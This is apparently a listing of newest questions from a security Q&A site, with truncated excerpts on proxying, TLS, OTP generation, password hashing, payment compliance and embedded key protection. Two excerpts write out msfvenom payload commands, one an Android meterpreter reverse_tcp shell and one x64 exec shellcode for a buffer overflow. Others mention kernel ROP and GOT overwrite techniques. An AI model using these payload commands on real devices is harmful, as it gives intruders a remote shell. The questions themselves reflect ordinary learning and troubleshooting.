Newest Questions
70,178 questions
0 votes, 0 answers, 6 views
Genymotion with Burp Suite proxy setup failed
I'm using Genymotion V3.9.0, and I want to configure it to use the Burp Suite proxy to capture traffic.
I've done steps mentioned in this blogpost:
https://medium.com/@mahmud0x/genymotion-proxying-android-app-...
1 vote, 0 answers, 19 views
Kernel panic during ROP chain: GDB stepping mismatch and unexpected register state
I am working on a Linux x64 kernel exploitation CTF challenge. I have constructed a ROP chain to execute commit_creds(prepare_kernel_cred(0)).
However, I am encountering a major inconsistency between ...
-2 votes, 0 answers, 28 views
Excel's Protected View protecting files with no macros? [closed]
I have downloaded an .xlsx file and opened it in Excel 2021. It opened it in Protected View. Excel says that editing the document may cause harm.
How?
Note that an .xlsx cannot contain macros. Only ...
-1 votes, 0 answers, 26 views
How to make custom.chr in John the Ripper [closed]
I am on Windows 10, trying to create a custom.chr for a rapid search of passwords with a 7z-extracted hash, but I'm unable to create custom.chr when using the command:
.\john.exe --make-charset=custom.chr
...
0 votes, 0 answers, 69 views
Is juice jacking still a feasible threat that can easily succeed?
The TSA has recently been issuing warnings about juice jacking. I've seen juice jacking frequently discussed. To my understanding, whenever a proof-of-concept for juice jacking is released, the OS ...
0 votes, 0 answers, 55 views
qBittorrent, did my IP leak? [closed]
I accidentally opened qBittorrent without the VPN on: the kill switch, app switch, and VPN were all off.
However as I have hundreds of torrents seeding and downloading, the checking process at startup, which shows ...
19 votes, 8 answers, 3k views
Plausibility of a write-only hack of an employee database
I am writing a book, and in it, a character has hacked an employee database. They want to do two things: read and write. They want to see all the employees, but they also want to insert a new employee ...
-2 votes, 0 answers, 39 views
How do privilege escalation techniques differ between Windows and Linux systems? [closed]
I encountered privilege escalation modules while preparing for Certified Ethical Hacker Exam, but the exam material is often shallow. Most resources like Pass4Future give high-level explanations in ...
-4 votes, 0 answers, 61 views
Who is doing this? [closed]
I had this girl with access to my Wi-Fi router, and out of nowhere she starts acting weird, and my two T-Mobile phones both log me out of my emails and start doing things on their own.
I saw the little ...
2 votes, 2 answers, 76 views
PII data in id_token (OIDC)
Is it a security risk to include sensitive PII such as date of birth, email address, and phone number directly in an OpenID Connect ID token (id_token)? My development team insists this aligns with ...
-1 votes, 2 answers, 138 views
Doesn't the fact that local .html files are able to access any file on the user's hard drive make opening them extremely dangerous?
I figured out recently that using this you can load any file stored on the user's computer from a local HTML file:
// Create a new <img> element
let img = document.createElement('img');
// Set ...
0 votes, 0 answers, 37 views
GPG on MacOS: dirmngr unable to resolve keyserver URI, common causes ruled out, how to troubleshoot further? [migrated]
I've recently migrated to a new Macbook Pro where I'm having issues with gpg. The following issues occur only on the new laptop. I can't find any difference between the GPG configuration on the two ...
0 votes, 0 answers, 42 views
Is there any research on quantifying the security risks associated with certain design decisions, e.g. DMZ or no DMZ?
I have an application that is designed to be installed in a distributed fashion (Firewall | WebApp in DMZ | Firewall | AppServer | DatabaseServer || Security), but which can also run if everything is ...
0 votes, 1 answer, 67 views
Should a server TLS Alert when the client selects an EC-based cipher but doesn't provide ec_point_formats?
Everything is mostly in the title. Just to add, this is in the context of TLS 1.2. I ask because I have a server where, if you force a cipher that utilizes EC but do not send an ec_point_formats ...
13 votes, 3 answers, 2k views
Installing root certificates by government
The government of Kazakhstan, in order for citizens to use electronic government services (egov.kz), requires installing the NCALayer application on the computer for working with digital signatures. ...
1 vote, 0 answers, 30 views
How .got entry overriding works in heap overflow
I'm new to exploit dev. While reading writeups of the Protostar heap1 exercise, I came across people overwriting a .got entry with a value provided by the user, which led to calling a function that was supposed to be not ...
0 votes, 2 answers, 89 views
Understanding of Client Authentication Certificates for mTLS
A third party supplier of an mTLS protected service gave us the following requirement:
We were to obtain & share with them a client authentication certificate so their service can authenticate us
...
0 votes, 0 answers, 38 views
Securing Unity WebGL Games (in Web and Mobile Apps) Against Unauthorized Extraction and Redistribution
Context:
Our organization develops educational applications for children that embed Unity WebGL games within mobile (flutter) and web platforms.
The games are fetched from our backend server and must ...
0 votes, 1 answer, 128 views
Does re-timestamping bring value?
My question is about the validity of eIDAS signatures, signed with the B-LTA level, if I do not re-timestamp when the TSA certificate expires.
Assume that the chain of certificates as well as ...
0 votes, 1 answer, 113 views
What security measures should websites take when using PINs over passwords?
I can think of obvious reasons why a website should use passwords over pins (entropy, etc.), but there is at least one very well-known British gambling website that uses pins over passwords, and, to ...
11 votes, 4 answers, 3k views
Is user enumeration a problem for a passwordless app?
My company has implemented a passwordless login method. Our users input their email address and then receive a 6-character code over email, which they use to log in. There is no alternative login ...
0 votes, 0 answers, 63 views
How to properly assume an AWS IAM Role in an automated way from server sitting outside of cloud?
To securely access AWS Services, I get it that you should always use IAM Roles, such that the credential exposure is always only temporary. What I do not fully understand is, how do you actually ...
1 vote, 0 answers, 49 views
Android msfvenom payload [closed]
I have a Samsung S24 and I tried to install msfvenom from Kali Linux, but I always get an error.
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.66 LPORT=555 --platform android -a dalvik -...
0 votes, 1 answer, 156 views
msfvenom-generated shellcode fails when using it in a buffer overflow
I use msfvenom-generated shellcode in a buffer overflow.
Here's the command that I used to create the shellcode for Linux x64:
msfvenom -p linux/x64/exec -f py -o shellcode.py -b '\x00' CMD=whoami
And here's ...
0 votes, 1 answer, 80 views
How to find out if a CSP report is an XSS vulnerability or a malicious browser extension?
I have recently added CSP headers to a rather complex web application, being report-only at first.
I got some noise from browser extensions in the report, but two incidents caught my eye especially:
...
1 vote, 0 answers, 35 views
Can a SIM card have malware and how can it spread? [duplicate]
I think that my SIM card has malware and I want to transfer it to my other phone. Would the malware transfer also?
I saw that it can attack during a phone update download. If the update has downloaded ...
1 vote, 0 answers, 132 views
GPU speedup for PBKDF2 vs bcrypt vs Argon2
I've got a service currently using PBKDF2-HMAC-SHA256 for password hashing, and I thought I'd upgrade that to something a wee bit more GPU-resistant, so I've been checking out my options, comparing ...
1 vote, 0 answers, 110 views
VPN client on a router versus VPN client on a computer
Until now, I have been using a VPN client on my computer. I did this to hide the fact that I was using Tor, as well as other activities, from my ISP. I would like to change my configuration. I want to ...
0 votes, 0 answers, 13 views
What is this path added by /etc/paths.d/10-pmk-global on macOS? [migrated]
I was upgrading my development setup, and I found this path in my PATH variable: /opt/pmk/env/global/bin, and it's added by /etc/paths.d/10-pmk-global.
Usually, a system-related program would go in /...
0 votes, 0 answers, 44 views
Possible web form injection from ad triggering biometric prompt
This morning, I was reading an article on a popular local news site on my Android phone. After being on the page for about a minute, the fingerprint prompt showed up on my screen. The text said it was ...
0 votes, 1 answer, 112 views
Is C#'s System.Web.Helpers.Crypto password-hashing still considered secure?
I've been provisionally using C#'s System.Web.Helpers.Crypto.HashPassword() and .VerifyHashedPassword() in an (in-development) accounting/finance web app. Before the app's published, I'd like to ...
0 votes, 1 answer, 237 views
File backup encryption for personal files
I would like to be able to store backups on potentially "untrustworthy" sources such as cloud storage. Whilst I could probably get away with a simple encrypted tar file, for a single backup, ...
5 votes, 1 answer, 852 views
Can you bypass PIN requirement of FIDO token protected LUKS device with hex editor?
I noticed that with Linux pam-u2f module whether you are required to input your PIN can be changed by simply editing ~/.config/Yubico/u2f_keys file and either adding +pin to your configuration line or ...
6 votes, 1 answer, 645 views
What is the difference between contactless Apple Pay and contactless card?
Apple claims that one time token is created. What is the purpose of that token? What happens with that token?
As far as I know when I pay with my physical debit card the information passed the POS ...
0 votes, 1 answer, 55 views
PCI applicability when only typing cc info into a client's payment system
My company has a small call center. Less than 100 people. Currently we do not do any credit card transactions but are looking to do so in the future.
One potential client has us using their ...
7 votes, 3 answers, 2k views
Does an SMS OTP have to be recreated for every message?
I use SMS for MFA (yes, I know it's bad, but better than no MFA) in a web application.
On login an OTP is sent to the user via SMS.
This OTP is valid until:
it expires after 10 minutes
it is ...
0 votes, 0 answers, 25 views
Why is the raw log data parsed by Defender different from what is shown in the Defender console?
How does Defender for Cloud interpret and normalize these logs?
In the Defender console, I see an inbound connection on a DMZ host (acting as an FTP server using vShell), showing Tor IP → internal IP.
...
0 votes, 1 answer, 69 views
Does a qualified electronic signature require certified middleware?
When you interact with a QSCD on a token, do you need the middleware to be issued by a Trusted Service Provider (TSP), or is the middleware just a utility which I can reimplement on another platform?
Does ...
1 vote, 0 answers, 55 views
How can I restrict IFEO vulnerability?
I have an application, myapplication.exe. Through the IFEO registry I can attach a debugger, which can be a malicious piece of software for an attacker.
Only someone having access to Windows registry can ...
0 votes, 0 answers, 75 views
What is the appropriate incident-response procedure after a user clicks a phishing link without entering credentials? [duplicate]
A user accidentally clicked a link in a phishing email.
The link led to what appeared to be an online video-course/tutorial site. The user did not enter any credentials, download any files, or ...
0 votes, 1 answer, 120 views
How can I ensure that I have enough entropy in a base64-encoded byte string?
In PHP I am generating a unique random token used as a code and index for password resets:
declare(strict_types=1);
namespace App\Domain\Helper;
use Ramsey\Uuid\Uuid;
use Random\RandomException;
...
0 votes, 0 answers, 4 views
How to analyse Android mobile memory? [migrated]
Is there any method to forensically analyse Android mobile memory without rooting the phone? I want to capture malware in my Android phone.
0 votes, 3 answers, 125 views
Generating OTP used in SMS and email
I am using the following approach for a time-limited OTP used in my PHP app, using a pseudorandom generator:
$otp=str_pad((string)random_int(0, 9999), 4, '0', STR_PAD_LEFT);
Then upon the User I store:...
0 votes, 0 answers, 56 views
Does chocolatey provide cryptographic authentication and integrity validation?
Does the chocolatey package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them?
I usually trust my OS ...
0 votes, 1 answer, 47 views
Does cygwin provide cryptographic authentication and integrity validation?
Does the cygwin package manager cryptographically validate its payload's authentication and integrity for all packages after downloading them and before installing them?
Fortunately, it's possible to ...
3 votes, 7 answers, 3k views
How to Protect Commercial Java Software Running on Client Machines?
I am making my first commercial Java program and am worried about crack prevention. I would run it on the cloud, except it needs to run on their machine at a runtime. I have an obfuscator set up, but ...
0 votes, 0 answers, 70 views
What is commonly done in embedded/IoT systems to encrypt flash storage? Is TPM, PUFs, eFUSEs, TEE used to get the decryption key?
Assuming that RAM is inside the SoC, nullifying the possibility of cold-boot attacks, the only other way to obtain the decryption key is to extract it from the secure storage in which it is saved.
I ...
0 votes, 0 answers, 42 views
Tokenized PAN & PCI DSS Compliance
I have been asked to implement a new payment system that uses Google/Apple Pay's Direct integration (using Tokenized PANs (DPAN), not clear cards) as well as a similar Tokenized PAN retrieved from our ...
0 votes, 2 answers, 210 views
How do embedded systems protect encryption keys when no user authentication is possible at startup?
Embedded and IoT systems power on autonomously, without user input (unlike PCs or phones requiring a PIN/password). If the manufacturer wants to encrypt the flash storage:
Must the decryption key be ...
2 votes, 1 answer, 211 views
Why does BitLocker keep the Volume Master Key (VMK) in plaintext RAM instead of inside a TEE?
I have two related questions about BitLocker’s key handling:
1)
After the system boots and BitLocker unlocks the drive, TPM releases the Volume Master Key (VMK) and from now on it is resident in ...